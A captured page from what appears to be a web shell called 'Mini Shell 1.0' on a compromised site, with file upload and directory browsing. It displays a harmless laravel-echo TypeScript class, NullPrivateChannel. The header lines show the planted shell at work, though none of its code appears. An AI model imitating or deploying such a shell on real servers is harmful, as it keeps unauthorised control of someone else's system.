HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /proc/thread-self/cwd/node_modules/laravel-echo/src/channel/
Upload File :
Current File : //proc/thread-self/cwd/node_modules/laravel-echo/src/channel/null-private-channel.ts
import { NullChannel } from './null-channel';

/**
 * This class represents a null private channel.
 */
export class NullPrivateChannel extends NullChannel {
    /**
     * Send a whisper event to other clients in the channel.
     */
    whisper(eventName: string, data: any): NullPrivateChannel {
        return this;
    }
}